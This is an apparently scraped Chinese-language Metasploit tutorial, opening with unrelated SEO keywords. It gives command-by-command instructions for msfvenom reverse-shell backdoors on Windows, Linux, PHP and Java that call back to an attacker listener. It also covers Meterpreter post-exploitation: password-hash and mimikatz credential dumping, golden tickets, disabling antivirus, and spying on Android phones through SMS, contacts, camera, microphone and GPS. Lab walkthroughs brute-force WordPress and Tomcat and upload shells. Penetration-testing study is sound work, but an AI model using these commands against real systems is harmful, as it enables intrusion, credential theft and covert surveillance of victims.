谷歌搜索引擎下载安装,长沙seo优化,前端自己做博客网站,给你一个网站如何做推广MSF的使用 文章目录 MSF的使用MSF简介msf模块msf常用命令msf信息收集msf生成后门meterpreter介绍一、 Meterpreter是什么二、Meterpreter中常用的反弹类型三、Meterpreter的常用命令1.基本命令2 常用命令2.1 针对安卓手机的一些命令2.2 针对Windows的一些命令 3.文件系统命令 m…MSF的使用 文章目录 MSF的使用MSF简介msf模块msf常用命令msf信息收集msf生成后门meterpreter介绍一、 Meterpreter是什么二、Meterpreter中常用的反弹类型三、Meterpreter的常用命令1.基本命令2 常用命令2.1 针对安卓手机的一些命令2.2 针对Windows的一些命令 3.文件系统命令 msf的更新msf渗透wordpress博客msf爆破tomcat并获得shell MSF简介
Metasploit框架Metasploit Framework, MSF是一个开源工具旨在方便渗透测试它是由Ruby程序语言编写的模板化框架具有很好的扩展性便于渗透测试人员开发、使用定制的工具模板。 Metasploit可向后端模块提供多种用来控制测试的接口如控制台、 Web 、 CLI 。推荐使用控制台接口通过控制台接口你可以访问和使用所有Metasploit的插件例如Payload、利用模块、 Post模块等。 Metasploit还有第三方程序的接口例如Nmap、SQLMap 等可以直接在控制台接口里使用要访问该界面。
msf模块 exploits利用系统漏洞进行攻击的动作此模块对应每一个具体漏洞的攻击方法
payload成功exploit之后真正在目标系统执行的代码或指令
auxiliary执行信息收集、枚举、指纹探测、扫描等功能的辅助模块
encoders对payload进行加密躲避av检查的模块不好用
nops提高payload稳定性及维持大小
post后渗透模块
evasion直接生成windows免杀的木马效果差
Kali中的 msfvenom 取代了msfpayload和msfencode常用于生成后门木马
msfpayload是MSF攻击荷载生成器用于生成shellcode和可执行代码。 msfencode是MSF编码器。
msf常用命令
msfconsole #进入框架
help/? #查看帮助
search ms17_010 # 使用search命令查找相关漏洞
searchsploit #从exploit-db查找漏洞
info #使用info查看漏洞模块信息
use exploit/windows/smb/ms17_010_eternalblue # 使用use进入模块
show options #查看模块需要配置的参数
set payload windows/x64/meterpreter/reverse_tcp #设置攻击载荷
set RHOST 192.168.10.1 #设置目标的IP地址
set LHOST 192.168.1.1 #设置本地的IP地址
set LPORT 8888 #设置本地的监听端口
exploit / run #攻击
back #退回主界面
后渗透阶段 #后渗透阶段msf信息收集 msf生成后门
1、生成windows后门msfvenom -p windows/meterpreter/reverse_tcp LHOST攻击机IP LPORT攻击端口 -f exe -o /tmp/hack.exe
2、生成linux后门msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST攻击ip LPORT攻击端口 -f elf shell.elfuse exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.53
set LPORT 4444
exploitmeterpreter介绍
一、 Meterpreter是什么
Meterpreter是Metasploit框架中的一个利器作为漏洞溢出后的攻击载荷使用攻击载荷在触发漏洞后会返回一个由我们控制的通道可用于远程执行命令! Metasploit提供了各个主流平台的Meterpreter版本包括Windows、Linux同时支持x86、x64平台另外Meterpreter还提供了基于PHP和Java语言的实现。Meterpreter的工作模式是纯内存的好处是启动隐藏很难被杀毒软件监测到。不需要访问目标主机磁盘所以也没什么入侵的痕迹。除上述外Meterpreter还支持Ruby脚本形式的扩展。所以Ruby语言还很有必要了解下。
二、Meterpreter中常用的反弹类型
1.reverse_tcp 这是一个基于TCP的反向链接反弹shell, 使用起来很稳定
三、Meterpreter的常用命令
1.基本命令
help# 查看Meterpreter帮助
background#返回把meterpreter后台挂起
bgkill# 杀死一个 meterpreter 脚本
bglist#提供所有正在运行的后台脚本的列表
bgrun#作为一个后台线程运行脚本
channel#显示活动频道
sessions -i number # 与会话进行交互number表示第n个session,使用session -i 连接到指定序号的meterpreter会话已继续利用
sesssions -k number #杀死会话
close# 关闭通道
exit# 终止 meterpreter 会话
quit# 终止 meterpreter 会话
interact id #切换进一个信道
run#执行一个已有的模块这里要说的是输入run后按两下tab会列出所有的已有的脚本常用的有autoroute,hashdump,arp_scanner,multi_meter_inject等
irb# 进入 Ruby 脚本模式
read# 从通道读取数据
write# 将数据写入到一个通道
run和bgrun# 前台和后台执行以后它选定的 meterpreter 脚本
use# 加载 meterpreter 的扩展
load/use#加载模块
Resource#执行一个已有的rc脚本2 常用命令
2.1 针对安卓手机的一些命令
获取手机通讯录 dump_contacts
获取短信记录dump_sms
控制实验手机发短信send_sms -d 15330252525 -t “hello”
获取实验手机GPS定位信息geolocate
获取实验手机Wi-Fi定位信息wlan_geolocate
控制实验手机录音record_mic -d 5
获取实验手机相机设备webcam_list
控制实验手机拍照 webcam_snap
直播实验手机摄像头webcam_stream
2.2 针对Windows的一些命令
查看进程ps
查看当前进程号getpid
查看系统信息sysinfo
查看目标机是否为虚拟机run post/windows/gather/checkvm
查看完整网络设置route
查看当前权限getuid
自动提权getsystem
关闭杀毒软件run post/windows/manage/killav
启动远程桌面协议run post/windows/manage/enable_rdp
列举当前登录的用户run post/windows/gather/enum_logged_on_users
查看当前应用程序run post/windows/gather/enum_applications
抓取目标机的屏幕截图load espia screengrab
获取相机设备webcam_list
控制拍照 webcam_snap
直播摄像头webcam_stream
控制录音record_mic
查看当前处于目标机的那个目录pwd
查看当前目录getlwd
导出当前用户密码哈希 run hashdump
用户名SIDLM哈希NTLM哈希:::
也可以使用下面这个命令导出 权限更高 run windows/gather/smart_hashdump
抓取自动登录的用户名和密码 run windows/gather/credentials/windows_autologin
直接获取明文密码注意这个功能需要获取系统权限 获取系统权限需要输入getsystem
首选终端输入 load kiwi 加载kiwi
creds_all列举所有凭据
creds_kerberos列举所有kerberos凭据
creds_msv列举所有msv凭据
creds_ssp列举所有ssp凭据
creds_tspkg列举所有tspkg凭据
creds_wdigest列举所有wdigest凭据
dcsync通过DCSync检索用户帐户信息
dcsync_ntlm通过DCSync检索用户帐户NTLM散列、SID和RID
golden_ticket_create创建黄金票据
kerberos_ticket_list列举kerberos票据
kerberos_ticket_purge清除kerberos票据
kerberos_ticket_use使用kerberos票据
kiwi_cmd执行mimikatz的命令后面接mimikatz.exe的命令
lsa_dump_samdump出lsa的SAM
lsa_dump_secretsdump出lsa的密文
password_change修改密码
wifi_list列出当前用户的wifi配置文件
wifi_list_shared列出共享wifi配置文件/编码3.文件系统命令
cat c:\boot.ini#查看文件内容,文件必须存在
del c:\boot.ini #删除指定的文件
upload /root/Desktop/netcat.exe c:\ # 上传文件到目标机主上如upload setup.exe C:\windows\system32
download nimeia.txt /root/Desktop/ # 下载文件到本机上如download C:\boot.ini /root/或者download C:\“ProgramFiles”\Tencent\QQ\Users\295****125\Msg2.0.db /root/
edit c:\boot.ini # 编辑文件
getlwd#打印本地目录
getwd#打印工作目录
lcd#更改本地目录
ls#列出在当前目录中的文件列表
lpwd#打印本地目录
pwd#输出工作目录
cd c:\ #进入目录文件下
rm file #删除文件
mkdir dier #在受害者系统上的创建目录
rmdir#受害者系统上删除目录
dir#列出目标主机的文件和文件夹信息
mv#修改目标主机上的文件名
search -d d:\www -f web.config #search 文件如search -d c:\ -f.doc
meterpreter search -f autoexec.bat #搜索文件
meterpreter search -f sea.bat c:\xamp\
enumdesktops #用户登录数msf的更新
apt-get updateapt-get install metasploit-frameworkmsf渗透wordpress博客
坏境
攻击机kali ip192.168.145.128
靶机windows10 ip10.0.250.199
靶机建好wordpress wpscan扫描
扫用户
wpscan --url http://10.0.250.199/wordpress/ --enumerate u爆破管理员密码
wpscan --url 10.0.250.199/wordpress -U 用户名 -P 字典制作反弹shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST攻击机IP LPORT攻击端口 -o shell.php监听 msf爆破tomcat并获得shell
环境ubuntu:192.168.145.129 8080
kali192.168.145.128
启动tomcat服务 依次在kali上执行以下命令进行爆破ip为目标机ip 爆破出账号密码 生成木马
msfvenom -p java/meterpreter/reverse_tcp lhost攻击机 lport攻击机 -f war -o kali.war监听 上传木马 成功 提权
uname -a #查看内核查看exp 上传木马
成功